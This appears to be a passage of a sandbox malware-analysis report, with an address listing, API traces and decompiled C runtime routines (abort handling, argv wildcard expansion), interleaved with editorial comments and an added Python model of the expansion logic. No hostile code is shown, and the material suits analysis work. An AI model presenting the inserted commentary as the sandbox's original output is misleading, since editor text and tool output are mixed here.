    0x1000bf0f
    0x1000bf11
    0x1000bf17
    0x1000bf17
    0x1000bf19
    0x1000bf19
    0x1000bf1b
    0x1000bf24
    0x1000bf2b
    0x1000bf2e
    0x1000bf2f
    0x1000bf31
    0x1000bf31
    0x1000bfea
    0x1000bfea
    0x1000bfec
    0x00000000
    0x1000bff2
    0x1000bff2
    0x1000bff8
    0x1000bffb
    0x1000bf3e
    0x1000bf45
    0x00000000
    0x1000c001
    0x1000c003
    0x1000c009
    0x1000c00f
    0x1000c010
    0x1000c207
    0x1000c207
    0x1000c20e
    0x1000c20f
    0x1000c210
    0x1000c215
    0x1000c218
    0x1000c218
    0x1000bffb
    0x1000bfec
    0x1000bf03
    0x1000bee0
    0x1000bee0
    0x1000bee2
    0x1000bee8
    0x1000c192
    0x1000c192
    0x1000c193
    0x1000c199
    0x1000c199
    0x1000c1a0
    0x1000c1a1
    0x1000c1a2
    0x1000c1a7
    0x1000c1aa
    0x1000c1aa
    0x1000c1aa
    0x1000bede
    0x1000c1ac
    0x1000c1ac
    0x1000c1ae
    0x1000c21c
    0x1000c223
    0x1000c223
    0x1000c223
    0x1000c22a
    0x1000c22c
    0x1000c232
    0x1000c233
    0x1000c6df
    0x1000c6df
    0x1000c6e0
    0x1000c6e1
    0x1000c6e6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x1000c1b0
    0x1000c1b6
    0x1000c1b6
    0x1000c1bc
    0x1000c1bc
    0x1000c1c8
    0x00000000
    0x1000c1c8
    0x1000be57
    0x1000c6e9
    0x1000c6e9
    0x1000c6ef
    0x1000c6f1
    0x1000c6f7
    0x1000c6fd
    0x1000c6ff
    0x1000c701
    0x1000c703
    0x1000c703
    0x1000c705
    0x1000c705
    0x1000c70e
    0x1000c70f
    0x1000c713
    0x1000c71a
    0x1000c71d
    0x1000c71e
    0x1000c720
    0x1000c720
    0x1000c724
    0x1000c72a
    0x1000c72c
    0x1000c732
    0x1000c734
    0x1000c73a
    0x1000c73d
    0x1000c750
    0x1000c752
    0x1000c753
    0x1000c759
    0x1000c765
    0x1000c76c
    0x1000c76d
    0x1000c76e
    0x1000c773
    0x1000c73f
    0x1000c741
    0x1000c748
    0x1000c748
    0x1000c73d
    0x1000c776
    0x1000c776
    0x1000c786
    0x1000c78f
    0x1000c790
    0x1000c792
    0x1000c829
    0x1000c82b
    0x1000c836
    0x1000c836
    0x1000c838
    0x1000c83b
    0x1000c83d
    0x00000000
    0x1000c82d
    0x1000c833
    0x1000c833
    0x1000c798
    0x1000c798
    0x1000c79e
    0x1000c7a1
    0x1000c7a7
    0x1000c7aa
    0x1000c7b0
    0x1000c7b2
    0x1000c7b8
    0x1000c7ba
    0x1000c7bc
    0x1000c7bc
    0x1000c7be
    0x1000c7be
    0x1000c7cb
    0x1000c7d2
    0x1000c7d5
    0x1000c7d6
    0x1000c7d8
    0x1000c7d9
    0x1000c7d9
    0x1000c7dd
    0x1000c7e3
    0x1000c7e5
    0x1000c7e7
    0x1000c7ed
    0x1000c7f0
    0x1000c803
    0x1000c804
    0x1000c80a
    0x1000c816
    0x1000c81d
    0x1000c81e
    0x1000c81f
    0x1000c824
    0x1000c7f2
    0x1000c7f2
    0x1000c7f9
    0x1000c7f9
    0x1000c7f0
    0x1000c7e5
    0x1000c843
    0x1000c843
    0x1000c843
    0x1000c84f
    0x1000c852
    0x1000c858
    0x1000c85a
    0x1000c85c
    0x1000c862
    0x1000c864
    0x1000c864
    0x1000c864
    0x1000c862
    0x1000c869
    0x1000c86a
    0x1000c86c
    0x1000c86e
    0x1000c86e
    0x1000c870
    0x1000c876
    0x1000c87c
    0x1000c87e
    0x1000c884
    0x1000c884
    0x1000c88a
    0x1000c88c
    0x00000000
    0x00000000
    0x1000c892
    0x1000c894
    0x1000c896
    0x1000c896
    0x1000c898
    0x1000c898
    0x1000c8a8
    0x1000c8af
    0x1000c8b2
    0x1000c8b3
    0x1000c8b5
    0x1000c8b5
    0x1000c8b9
    0x1000c8bf
    0x1000c8c1
    0x1000c8c3
    0x1000c8c9
    0x1000c8cc
    0x1000c8dd
    0x1000c8df
    0x1000c8e0
    0x1000c8e6
    0x1000c8f2
    0x1000c8f9
    0x1000c8fa
    0x1000c8fb
    0x1000c900
    0x1000c8ce
    0x1000c8ce
    0x1000c8d5
    0x1000c8d5
    0x1000c8cc
    0x1000c911
    0x1000c920
    0x1000c921
    0x1000c921
    0x1000c923
    0x1000c925
    0x1000c925
    0x1000c92b
    0x1000c92e
    0x1000c930
    0x1000c932
    0x1000c932
    0x1000c935
    0x1000c936
    0x1000c936
    0x1000c93b
    0x1000c93e
    0x1000c942
    0x1000c942
    0x1000c943
    0x1000c945
    0x1000c94b
    0x1000c951
    0x00000000
    0x00000000
    0x00000000
    0x1000c951
    0x1000c884
    0x1000c957
    0x1000c957
    0x00000000
    0x1000c957
    0x1000b6dc
    0x1000b6d3
    0x1000b6ca
    0x1000b681
    0x1000b685
    0x1000b68d
    0x00000000
    0x1000b68f
    0x1000b695
    0x1000b69a
    0x1000c976
    0x1000c976
    0x1000c979
    0x1000c984
    0x1000c9af
    0x1000c9b0
    0x1000c9b1
    0x1000c9b2
    0x1000c9b3
    0x1000c9b4
    0x1000c9b9
    0x1000c9bc
    0x1000c9bf
    0x1000c9c0
    0x1000c9c3
    0x1000c9c5
    0x1000c9cb
    0x1000c9ce
    0x1000c9d0
    0x1000c9e5
    0x1000c9e6
    0x1000c9e9
    0x1000c9eb
    0x1000ca01
    0x1000ca07
    0x1000ca0f
    0x1000ca11
    0x1000ca1c
    0x1000ca1f
    0x1000ca36
    0x1000ca21
    0x1000ca21
    0x1000ca26
    0x00000000
    0x1000ca26
    0x1000ca13
    0x1000ca13
    0x1000ca18
    0x1000ca28
    0x1000ca28
    0x1000ca29
    0x1000ca2b
    0x1000ca30
    0x1000ca30
    0x1000c9ed
    0x1000c9ed
    0x1000c9f0
    0x00000000
    0x1000c9f2
    0x1000c9f5
    0x1000c9fd
    0x1000c9fd
    0x1000c9f0
    0x1000c9d2
    0x1000c9d2
    0x1000c9d9
    0x1000c9da
    0x1000c9dc
    0x1000c9e1
    0x1000c9e1
    0x1000c9c7
    0x1000c9c7
    0x1000c9c7
    0x1000ca3a
    0x1000c986
    0x1000c986
    0x1000c986
    0x1000c990
    0x1000c999
    0x1000c99e
    0x1000c9ac
    0x1000c9ac
    0x1000c984
    0x1000b68d

    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 85%
    			E00C51A54(intOrPtr __edx, intOrPtr __edi, intOrPtr _a4) {
    				char _v0;
    				struct _EXCEPTION_POINTERS _v12;
    				intOrPtr _v80;
    				intOrPtr _v88;
    				char _v92;
    				intOrPtr _v608;
    				intOrPtr _v612;
    				void* _v616;
    				intOrPtr _v620;
    				char _v624;
    				intOrPtr _v628;
    				intOrPtr _v632;
    				intOrPtr _v636;
    				intOrPtr _v640;
    				intOrPtr _v644;
    				_Unknown_base(*)()* _v648;
    				intOrPtr _v652;
    				intOrPtr _v656;
    				intOrPtr _v660;
    				intOrPtr _v664;
    				intOrPtr _v668;
    				char _v808;
    				char* _t38;
    				long _t48;
    				signed int _t50;
    				intOrPtr _t51;
    				signed char _t54;
    				intOrPtr _t55;
    				intOrPtr _t56;
    				intOrPtr _t57;
    
    				_t57 = __edi;
    				_t56 = __edx;
    				if(IsProcessorFeaturePresent(0x17) != 0) { /* 0x17 = PF_FASTFAIL_AVAILABLE; the routine has the shape of the MSVC CRT's report-fault path used by abort() */
    					_t55 = _a4;
    					asm("int 0x29"); /* __fastfail: the process is terminated at once, no exception filter runs */
    				}
    				 *0xc6ad00 = 0;
    				_v632 = E00C53610(_t57,  &_v808, 0, 0x2cc); /* zero a 0x2cc-byte x86 CONTEXT */
    				_v636 = _t55;
    				_v640 = _t56;
    				_v644 = _t51;
    				_v648 = 0;
    				_v652 = _t57;
    				_v608 = ss; /* segment registers, EFLAGS, ESP and the return address are captured into the CONTEXT below */
    				_v620 = cs;
    				_v656 = ds;
    				_v660 = es;
    				_v664 = fs;
    				_v668 = gs;
    				asm("pushfd");
    				_pop( *_t15);
    				_v624 = _v0;
    				_t38 =  &_v0;
    				_v612 = _t38;
    				_v808 = 0x10001; /* ContextFlags = CONTEXT_i386 | CONTEXT_CONTROL */
    				_v628 =  *((intOrPtr*)(_t38 - 4));
    				E00C53610(_t57,  &_v92, 0, 0x50); /* zero a 0x50-byte EXCEPTION_RECORD */
    				_v92 = 0x40000015; /* ExceptionCode = STATUS_FATAL_APP_EXIT */
    				_v88 = 1; /* ExceptionFlags = EXCEPTION_NONCONTINUABLE */
    				_v80 = _v0; /* ExceptionAddress */
    				_t28 = IsDebuggerPresent() - 1; // -1
    				_v12.ExceptionRecord =  &_v92;
    				asm("sbb bl, bl"); /* remember whether a debugger was attached; this is CRT error handling, not sample anti-debug logic */
    				_v12.ContextRecord =  &_v808;
    				_t54 =  ~_t28 + 1;
    				SetUnhandledExceptionFilter(0); /* drop any user filter so the default handler receives the record */
    				_t48 = UnhandledExceptionFilter( &_v12);
    				if(_t48 == 0) {
    					_t50 =  ~(_t54 & 0x000000ff);
    					asm("sbb eax, eax");
    					 *0xc6ad00 =  *0xc6ad00 & _t50;
    					return _t50;
    				}
    				return _t48;
    			}

    (instruction-address column for E00C51A54, 0x00c51a54 to 0x00c51b6e, one address per decompiled line)

    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C51A61
    • IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 00C51B29
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C51B48
    • UnhandledExceptionFilter.KERNEL32(?), ref: 00C51B52
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 71%
    			E00C5850A(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
    				intOrPtr _v8;
    				signed int _v12;
    				intOrPtr _v28;
    				signed int _v32;
    				WCHAR* _v36;
    				signed int _v48;
    				intOrPtr _v556;
    				intOrPtr _v558;
    				struct _WIN32_FIND_DATAW _v604;
    				intOrPtr* _v608;
    				signed int _v612;
    				signed int _v616;
    				intOrPtr _v644;
    				intOrPtr _v648;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t40;
    				signed int _t45;
    				signed int _t48;
    				signed int _t50;
    				signed int _t51;
    				signed char _t53;
    				signed int _t62;
    				void* _t64;
    				union _FINDEX_INFO_LEVELS _t66;
    				signed int _t71;
    				intOrPtr* _t72;
    				signed int _t75;
    				void* _t82;
    				void* _t84;
    				signed int _t85;
    				void* _t89;
    				WCHAR* _t90;
    				void* _t91;
    				intOrPtr* _t94;
    				intOrPtr _t97;
    				void* _t99;
    				signed int _t100;
    				intOrPtr* _t104;
    				signed int _t107;
    				void* _t110;
    				intOrPtr _t111;
    				void* _t112;
    				void* _t114;
    				void* _t115;
    				signed int _t117;
    				void* _t118;
    				union _FINDEX_INFO_LEVELS _t119;
    				void* _t120;
    				void* _t123;
    				void* _t124;
    				void* _t125;
    				signed int _t126;
    				void* _t127;
    				void* _t128;
    				signed int _t132;
    				void* _t133;
    				signed int _t134;
    				void* _t135;
    				void* _t136;
    
    				_push(__ecx);
    				_t94 = _a4;
    				_t2 = _t94 + 2; // 0x2
    				_t110 = _t2;
    				do {
    					_t40 =  *_t94;
    					_t94 = _t94 + 2;
    				} while (_t40 != 0);
    				_t117 = _a12;
    				_t97 = (_t94 - _t110 >> 1) + 1;
    				_v8 = _t97;
    				if(_t97 <= (_t40 | 0xffffffff) - _t117) { /* size_t overflow check before the allocation: length + directory_length must not wrap */
    					_t5 = _t117 + 1; // 0x1
    					_t89 = _t5 + _t97;
    					_t124 = E00C5623C(_t97, _t89, 2);
    					_t99 = _t123;
    					__eflags = _t117;
    					if(_t117 == 0) {
    						L6:
    						_push(_v8);
    						_t89 = _t89 - _t117;
    						_t45 = E00C5831A(_t99, _t124 + _t117 * 2, _t89, _a4);
    						_t134 = _t133 + 0x10;
    						__eflags = _t45;
    						if(__eflags != 0) {
    							goto L9;
    						} else {
    							_t82 = E00C58783(_a16, __eflags, _t124);
    							E00C56171(0);
    							_t84 = _t82;
    							goto L8;
    						}
    					} else {
    						_push(_t117);
    						_t85 = E00C5831A(_t99, _t124, _t89, _a8);
    						_t134 = _t133 + 0x10;
    						__eflags = _t85;
    						if(_t85 != 0) {
    							L9:
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							E00C54EB4(); /* noreturn error path (five NULL arguments, an _invalid_parameter/_invoke_watson style call) */
    							asm("int3"); /* int3 padding after the noreturn call: the decompiler ran on into the next routine, which starts here with its own prologue */
    							_t132 = _t134;
    							_t135 = _t134 - 0x260;
    							_t48 =  *0xc6a004; // 0x26d30358 (__security_cookie)
    							_v48 = _t48 ^ _t132; /* cookie XOR EBP stored in the /GS guard slot */
    							_t111 = _v28;
    							_t100 = _v32;
    							_push(_t89);
    							_t90 = _v36;
    							_push(_t124);
    							_push(_t117);
    							_t125 = 0x5c; /* '\\' */
    							_v644 = _t111;
    							_v648 = 0x2f; /* '/' */
    							_t118 = 0x3a; /* ':' */
    							while(1) {
    								__eflags = _t100 - _t90;
    								if(_t100 == _t90) {
    									break;
    								}
    								_t50 =  *_t100 & 0x0000ffff;
    								__eflags = _t50 - _v612;
    								if(_t50 != _v612) {
    									__eflags = _t50 - _t125;
    									if(_t50 != _t125) {
    										__eflags = _t50 - _t118;
    										if(_t50 != _t118) {
    											_t100 = _t100 - 2;
    											__eflags = _t100;
    											continue;
    										}
    									}
    								}
    								break;
    							}
    							_t126 =  *_t100 & 0x0000ffff;
    							__eflags = _t126 - _t118;
    							if(_t126 != _t118) {
    								L19:
    								_t51 = _t126;
    								_t119 = 0;
    								_t112 = 0x2f;
    								__eflags = _t51 - _t112;
    								if(_t51 == _t112) {
    									L23:
    									_t53 = 1;
    									__eflags = 1;
    								} else {
    									_t114 = 0x5c;
    									__eflags = _t51 - _t114;
    									if(_t51 == _t114) {
    										goto L23;
    									} else {
    										_t115 = 0x3a;
    										__eflags = _t51 - _t115;
    										if(_t51 == _t115) {
    											goto L23;
    										} else {
    											_t53 = 0;
    										}
    									}
    								}
    								_t103 = (_t100 - _t90 >> 1) + 1;
    								asm("sbb eax, eax");
    								_v612 =  ~(_t53 & 0x000000ff) & (_t100 - _t90 >> 0x00000001) + 0x00000001;
    								E00C53610(_t119,  &_v604, _t119, 0x250);
    								_t136 = _t135 + 0xc;
    								_t127 = FindFirstFileExW(_t90, _t119,  &_v604, _t119, _t119, _t119); /* the argument itself is the pattern; FindExInfoStandard, FindExSearchNameMatch */
    								__eflags = _t127 - 0xffffffff;
    								if(_t127 != 0xffffffff) {
    									_t104 = _v608;
    									_t62 =  *((intOrPtr*)(_t104 + 4)) -  *_t104;
    									__eflags = _t62;
    									_v616 = _t62 >> 2;
    									_t64 = 0x2e; /* '.' : used to skip the "." and ".." entries */
    									do {
    										__eflags = _v604.cFileName - _t64;
    										if(_v604.cFileName != _t64) {
    											L36:
    											_push(_t104);
    											_t66 = E00C5850A(_t104,  &(_v604.cFileName), _t90, _v612);
    											_t136 = _t136 + 0x10;
    											__eflags = _t66;
    											if(_t66 != 0) {
    												goto L26;
    											} else {
    												goto L37;
    											}
    										} else {
    											__eflags = _v558 - _t119;
    											if(_v558 == _t119) {
    												goto L37;
    											} else {
    												__eflags = _v558 - _t64;
    												if(_v558 != _t64) {
    													goto L36;
    												} else {
    													__eflags = _v556 - _t119;
    													if(_v556 == _t119) {
    														goto L37;
    													} else {
    														goto L36;
    													}
    												}
    											}
    										}
    										goto L40;
    										L37:
    										_t71 = FindNextFileW(_t127,  &_v604);
    										_t104 = _v608;
    										__eflags = _t71;
    										_t64 = 0x2e;
    									} while (_t71 != 0);
    									_t72 = _t104;
    									_t107 = _v616;
    									_t113 =  *_t72;
    									_t75 =  *((intOrPtr*)(_t72 + 4)) -  *_t72 >> 2;
    									__eflags = _t107 - _t75;
    									if(_t107 != _t75) {
    										E00C5B610(_t90, _t113 + _t107 * 4, _t75 - _t107, 4, E00C58325); /* qsort-like sort of the pointers appended above, 4 bytes each, comparator E00C58325 */
    									}
    								} else {
    									_push(_v608);
    									_t66 = E00C5850A(_t103, _t90, _t119, _t119);
    									L26:
    									_t119 = _t66;
    								}
    								__eflags = _t127 - 0xffffffff;
    								if(_t127 != 0xffffffff) {
    									FindClose(_t127);
    								}
    							} else {
    								__eflags = _t100 -  &(_t90[1]);
    								if(_t100 ==  &(_t90[1])) {
    									goto L19;
    								} else {
    									_push(_t111);
    									E00C5850A(_t100, _t90, 0, 0);
    								}
    							}
    							_pop(_t120);
    							_pop(_t128);
    							__eflags = _v12 ^ _t132;
    							_pop(_t91);
    							return E00C51252(_t91, _v12 ^ _t132, _t120, _t128); /* /GS cookie check before returning */
    						} else {
    							goto L6;
    						}
    					}
    				} else {
    					_t84 = 0xc; /* ENOMEM */
    					L8:
    					return _t84;
    				}
    				L40:
    			}
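What the merged listing above does, as an added example written by the editor (not code from the report, from the sample, or from Microsoft): its two halves have the shape of the C runtime's argv wildcard expansion. The part before the int3 appends one string to an argument buffer, optionally prefixed with a directory; the part after it scans an argument back to the last '\\', '/' or ':', enumerates the pattern with FindFirstFileExW/FindNextFileW, skips "." and "..", and sorts what it appended. The Python below models that control flow so the effect on argv can be checked offline. Assumptions not on the page: FindFirstFileExW/FindNextFileW are replaced by an injected find_files callable over a constructed listing, the comparator E00C58325 is taken to sort in ordinal order, and the caller's test for '*' or '?' (which is outside the listing) is modelled by feeding every argument through the expander.

```python
"""Reference model of the argv wildcard expansion decompiled as E00C5850A.

Added example (editor's reading of the listing), not the sample's code. The
listing merges two routines: a buffer-append helper and, after the int3, the
expander that calls FindFirstFileExW/FindNextFileW. Here the file system is
replaced by an injected find_files(pattern) callable and a constructed listing.
"""
from typing import Callable, Iterable, List, Optional

# Separator characters tested in the listing: 0x5c '\\', 0x2f '/', 0x3a ':'.
SEPARATORS = "\\/:"


def copy_and_add_argument_to_buffer(file_name: str, directory: Optional[str],
                                    directory_length: int,
                                    buffer: List[str]) -> None:
    """First routine (before the int3): append file_name to the argument
    buffer, prefixed with the first directory_length characters of directory
    when that length is non-zero. The size_t overflow check that returns 0xc
    (ENOMEM) in the listing has no equivalent with Python strings."""
    if directory_length:
        buffer.append(directory[:directory_length] + file_name)
    else:
        buffer.append(file_name)


def expand_argument_wildcards(argument: str,
                              find_files: Callable[[str], Iterable[str]],
                              buffer: List[str]) -> None:
    """Second routine (after the int3). find_files stands in for
    FindFirstFileExW/FindNextFileW and yields names as the API would,
    '.' and '..' included; an empty result models INVALID_HANDLE_VALUE."""
    if not argument:
        copy_and_add_argument_to_buffer(argument, None, 0, buffer)
        return

    # Walk backwards to the last separator (the first while loop); the scan
    # stops at the first character whether or not it is a separator.
    it = len(argument) - 1
    while it > 0 and argument[it] not in SEPARATORS:
        it -= 1

    # A ':' anywhere but at index 1 (drive letter) makes the argument
    # non-expandable: it is copied through unchanged.
    if argument[it] == ":" and it != 1:
        copy_and_add_argument_to_buffer(argument, None, 0, buffer)
        return

    # directory_length = separator index + 1, or 0 when there is none
    # (the neg/sbb/and idiom in the listing).
    directory_length = it + 1 if argument[it] in SEPARATORS else 0

    names = list(find_files(argument))
    if not names:
        # FindFirstFileExW failed: the literal argument is kept.
        copy_and_add_argument_to_buffer(argument, None, 0, buffer)
        return

    old_count = len(buffer)
    for name in names:
        if name in (".", ".."):     # the 0x2e checks on cFileName[0..2]
            continue
        copy_and_add_argument_to_buffer(name, argument, directory_length, buffer)

    # Newly appended entries are sorted in place (the E00C5B610 call with
    # comparator E00C58325); ordinal string order is assumed for the comparator.
    if len(buffer) != old_count:
        buffer[old_count:] = sorted(buffer[old_count:])


# Constructed directory listing standing in for the file system (not from the
# report). Entries are deliberately not in sorted order, like a real directory.
FAKE_FS = {
    "C:\\work\\*.log": [".", "..", "b.log", "a.log"],
    "*.txt": ["notes.txt"],
    "c:*.txt": ["x.txt"],
    "\\*.ini": ["w.ini"],
}


def fake_find_files(pattern: str) -> List[str]:
    return FAKE_FS.get(pattern, [])


def expand_argv(argv: List[str],
                find_files: Callable[[str], Iterable[str]] = fake_find_files
                ) -> List[str]:
    """Run every argument through the expander. The caller's test for '*'
    or '?' is outside the listing, so the model expands whatever it is given."""
    out: List[str] = []
    for arg in argv:
        expand_argument_wildcards(arg, find_files, out)
    return out


if __name__ == "__main__":
    print(expand_argv(["prog.exe", "C:\\work\\*.log", "*.txt", "C:nope:*.c"]))
```

The practical point for reading the report: when a statically linked CRT expands wildcards at startup, FindFirstFileExW and FindNextFileW appear in the API trace of any run whose command line carries a pattern, before any of the sample's own code executes. They should only be counted as the sample's file discovery when the call sites lie outside this runtime code.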

    APIs
      • Part of subcall function 00C5623C: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C58055,00000001,00000364,?,00C534C0,?,?,1FFFFFFF,?,?,00C51EFE,00C51FCA), ref: 00C5627D
      • Part of subcall function 00C54EB4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C54EB6
      • Part of subcall function 00C54EB4: GetCurrentProcess.KERNEL32(C0000417,?,00C51FCA), ref: 00C54ED8
      • Part of subcall function 00C54EB4: TerminateProcess.KERNEL32(00000000,?,00C51FCA), ref: 00C54EDF
    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00C58678
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 72%
    			E10008EEC(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
    				intOrPtr _v8;
    				signed int _v12;
    				intOrPtr* _v32;
    				CHAR* _v36;
    				signed int _v48;
    				char _v286;
    				signed int _v287;
    				struct _WIN32_FIND_DATAA _v332;
    				intOrPtr* _v336;
    				signed int _v340;
    				signed int _v344;
    				intOrPtr _v372;
    				signed int _t35;
    				signed int _t40;
    				signed int _t43;
    				intOrPtr _t45;
    				signed char _t47;
    				intOrPtr* _t55;
    				union _FINDEX_INFO_LEVELS _t57;
    				signed int _t62;
    				signed int _t65;
    				void* _t72;
    				void* _t74;
    				signed int _t75;
    				void* _t78;
    				CHAR* _t79;
    				intOrPtr* _t83;
    				intOrPtr _t85;
    				void* _t87;
    				intOrPtr* _t88;
    				signed int _t92;
    				signed int _t96;
    				void* _t101;
    				intOrPtr _t102;
    				signed int _t105;
    				union _FINDEX_INFO_LEVELS _t106;
    				void* _t111;
    				intOrPtr _t112;
    				void* _t113;
    				signed int _t118;
    				void* _t119;
    				signed int _t120;
    				void* _t121;
    				void* _t122;
    
    				_push(__ecx);
    				_t83 = _a4;
    				_t2 = _t83 + 1; // 0x1
    				_t101 = _t2;
    				do {
    					_t35 =  *_t83;
    					_t83 = _t83 + 1;
    				} while (_t35 != 0);
    				_push(__edi);
    				_t105 = _a12;
    				_t85 = _t83 - _t101 + 1;
    				_v8 = _t85;
    				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
    					_push(__ebx);
    					_push(__esi);
    					_t5 = _t105 + 1; // 0x1
    					_t78 = _t5 + _t85;
    					_t111 = E10005E8C(_t85, _t78, 1);
    					_pop(_t87);
    					__eflags = _t105;
    					if(_t105 == 0) {
    						L6:
    						_push(_v8);
    						_t78 = _t78 - _t105;
    						_t40 = E1000DC6B(_t87, _t111 + _t105, _t78, _a4);
    						_t120 = _t119 + 0x10;
    						__eflags = _t40;
    						if(__eflags != 0) {
    							goto L9;
    						} else {
    							_t72 = E1000912B(_a16, _t101, __eflags, _t111);
    							E10005D67(0);
    							_t74 = _t72;
    							goto L8;
    						}
    					} else {
    						_push(_t105);
    						_t75 = E1000DC6B(_t87, _t111, _t78, _a8);
    						_t120 = _t119 + 0x10;
    						__eflags = _t75;
    						if(_t75 != 0) {
    							L9:
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							E10006807();
    							asm("int3");
    							_t118 = _t120;
    							_t121 = _t120 - 0x150;
    							_t43 =  *0x1001d018; // 0x26c1db24
    							_v48 = _t43 ^ _t118;
    							_t88 = _v32;
    							_push(_t78);
    							_t79 = _v36;
    							_push(_t111);
    							_t112 = _v332.cAlternateFileName;
    							_push(_t105);
    							_v372 = _t112;
    							while(1) {
    								__eflags = _t88 - _t79;
    								if(_t88 == _t79) {
    									break;
    								}
    								_t45 =  *_t88;
    								__eflags = _t45 - 0x2f;
    								if(_t45 != 0x2f) {
    									__eflags = _t45 - 0x5c;
    									if(_t45 != 0x5c) {
    										__eflags = _t45 - 0x3a;
    										if(_t45 != 0x3a) {
    											_t88 = E1000DCC0(_t79, _t88);
    											continue;
    										}
    									}
    								}
    								break;
    							}
    							_t102 =  *_t88;
    							__eflags = _t102 - 0x3a;
    							if(_t102 != 0x3a) {
    								L19:
    								_t106 = 0;
    								__eflags = _t102 - 0x2f;
    								if(_t102 == 0x2f) {
    									L23:
    									_t47 = 1;
    									__eflags = 1;
    								} else {
    									__eflags = _t102 - 0x5c;
    									if(_t102 == 0x5c) {
    										goto L23;
    									} else {
    										__eflags = _t102 - 0x3a;
    										if(_t102 == 0x3a) {
    											goto L23;
    										} else {
    											_t47 = 0;
    										}
    									}
    								}
    								_t90 = _t88 - _t79 + 1;
    								asm("sbb eax, eax");
    								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
    								E10001E90(_t106,  &_v332, _t106, 0x140);
    								_t122 = _t121 + 0xc;
    								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
    								_t55 = _v336;
    								__eflags = _t113 - 0xffffffff;
    								if(_t113 != 0xffffffff) {
    									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
    									__eflags = _t92;
    									_t93 = _t92 >> 2;
    									_v344 = _t92 >> 2;
    									do {
    										__eflags = _v332.cFileName - 0x2e;
    										if(_v332.cFileName != 0x2e) {
    											L36:
    											_push(_t55);
    											_t57 = E10008EEC(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
    											_t122 = _t122 + 0x10;
    											__eflags = _t57;
    											if(_t57 != 0) {
    												goto L26;
    											} else {
    												goto L37;
    											}
    										} else {
    											_t93 = _v287;
    											__eflags = _t93;
    											if(_t93 == 0) {
    												goto L37;
    											} else {
    												__eflags = _t93 - 0x2e;
    												if(_t93 != 0x2e) {
    													goto L36;
    												} else {
    													__eflags = _v286;
    													if(_v286 == 0) {
    														goto L37;
    													} else {
    														goto L36;
    													}
    												}
    											}
    										}
    										goto L40;
    										L37:
    										_t62 = FindNextFileA(_t113,  &_v332);
    										__eflags = _t62;
    										_t55 = _v336;
    									} while (_t62 != 0);
    									_t103 =  *_t55;
    									_t96 = _v344;
    									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
    									__eflags = _t96 - _t65;
    									if(_t96 != _t65) {
    										E1000D820(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E10008D44);
    									}
    								} else {
    									_push(_t55);
    									_t57 = E10008EEC(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
    									L26:
    									_t106 = _t57;
    								}
    								__eflags = _t113 - 0xffffffff;
    								if(_t113 != 0xffffffff) {
    									FindClose(_t113);
    								}
    							} else {
    								__eflags = _t88 -  &(_t79[1]);
    								if(_t88 ==  &(_t79[1])) {
    									goto L19;
    								} else {
    									_push(_t112);
    									E10008EEC(_t79, _t88, 0, _t112, _t79, 0, 0);
    								}
    							}
    							__eflags = _v12 ^ _t118;
    							return E10001B26(_v12 ^ _t118);
    						} else {
    							goto L6;
    						}
    					}
    				} else {
    					_t74 = 0xc;
    					L8:
    					return _t74;
    				}
    				L40:
    			}

    APIs
      • Part of subcall function 10005E8C: HeapAlloc.KERNEL32(00000008,00000001,00000000,?,10007C74,00000001,00000364,?,100059D4,00000001,00000001), ref: 10005ECD
      • Part of subcall function 10006807: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10006809
      • Part of subcall function 10006807: GetCurrentProcess.KERNEL32(C0000417,00000001), ref: 1000682B
      • Part of subcall function 10006807: TerminateProcess.KERNEL32(00000000), ref: 10006832
    • FindFirstFileExA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 10009031
    Strings
    Memory Dump Source
